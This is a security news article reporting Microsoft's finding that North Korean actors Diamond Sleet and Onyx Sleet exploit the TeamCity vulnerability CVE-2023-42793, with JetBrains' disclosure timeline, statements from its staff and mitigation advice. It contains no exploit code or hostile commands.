Two North Korean nation-state actors known to commit supply chain attacks are exploiting a critical JetBrains TeamCity vulnerability, according to new research by Microsoft.
In a blog post Wednesday, Microsoft revealed two North Korean threat actors tracked as Diamond Sleet and Onyx Sleet, have been exploiting a remote code execution flaw, tracked as CVE-2023-42793, since early October. The vulnerability, which was assigned a CVSS score of 9.8, affects multiple versions of JetBrains TeamCity server and could allow an attacker to bypass authentication.
TeamCity is a continuous integration/continuous deployment (CI/CD) platform designed by Czech software vendor JetBrains for enterprise DevOps teams. JetBrains has more than 2 million customers worldwide, according to the company, including large enterprises such as United Airlines.
During attacks, Microsoft observed both threat actors leveraging unique sets of tools and techniques after successfully exploiting CVE-2023-42793. Some of the tools and malware were used to create backdoors to maintain persistent access to victim environments. Microsoft said it directly notified any targeted or compromised customers, though the scope of exploitation remains unknown.
However, based on previous activity, the actors could pose a widespread threat to the software supply chain. One example occurred in August when Microsoft said Diamond Sleet conducted a supply chain compromise of a German software provider.
"In past operations, Diamond Sleet and other North Korean threat actors have successfully carried out software supply chain attacks by infiltrating build environments. Given this, Microsoft assesses that this activity poses a particularly high risk to organizations who are affected," Microsoft wrote in the blog.
Previous Diamond Sleet targets observed by Microsoft included media, IT services and defense-related entities around the world. As for Onyx Sleet, the actor is known to exploit N-day vulnerabilities as an initial attack vector.
Olga Bedrina, TeamCity technical marketing writer, initially detailed the vulnerability disclosure timeline in a blog post last month. Software development platform Sonar reported the critical vulnerability to JetBrains on Sept. 6 and confirmed it only affected TeamCity On-Premises instances and not TeamCity cloud. JetBrains released a plugin as a workaround until a patch was available on Sept. 18. Customers received mitigation steps in an advisory on Sept. 21 and were urged to upgrade to the fixed version 2023.05.4.
On Sept. 27, Bedrina said all TeamCity On-Premises customers were notified about the vulnerability. She emphasized that the vulnerability could allow an attacker to gain administrative control of the TeamCity server.
Daniel Gallo, TeamCity solutions engineer, provided an update on Tuesday to address Microsoft's warnings. Microsoft notified JetBrains of exploitation activity by Diamond Sleet and Onyx Sleet on October 17. While Gallo's blog post did not confirm if JetBrains observed the same exploitation and compromise that Microsoft did, he expanded on the threat activity to TechTarget Editorial.
"We have kept in close contact with our customers since the initial discovery and resolution of the CVE-2023-42793 vulnerability in TeamCity On-Premises to ensure they were aware of the serious nature of the issue. We also provided our customers with various options to mitigate the issue when we first released details of the vulnerability to our customer base on September 21, 2023," he wrote in an email to TechTarget Editorial.
"We are aware of a small number of TeamCity On-Premises customers who have since reached out to our support team over the previous weeks expressing concerns their environments may have been compromised due to the CVE-2023-42793 vulnerability. However, we are not aware if those customers have been compromised in the same way described by the Microsoft Threat Intelligence Center Team in their blog post. As TeamCity On-Premises is installed in environments maintained by our customers, we don't have visibility into how those environments are configured. Our SaaS offering (TeamCity Cloud) wasn't susceptible to this vulnerability, so [it] isn't impacted."
Gallo and Microsoft recommended updating to the fixed version of TeamCity and reviewing Microsoft's indicators of compromise. Microsoft also warned users to be aware of suspicious PowerShell downloads, which Diamond Sleet used following successful compromise of TeamCity servers.
Additionally, Microsoft urged users to "take immediate action to address malicious activity on the impacted device." If the nation-state actors launched malicious code, Microsoft said it's likely the attacker gained complete control of the device, so system isolation and credential resets are critical.
TeamCity users that patched after early October may be at a higher risk of attacks, according to Gallo.
"If you upgraded your TeamCity server to 2023.05.4 or applied the security patch plugin since early October 2023, there is a higher probability that your TeamCity environment was already exploited prior to the implementation of any mitigation steps (since the North Korean nation-state threat actors have been observed exploiting this vulnerability since early October 2023)," Gallo wrote in the blog.
Arielle Waldman is a Boston-based reporter covering enterprise security news.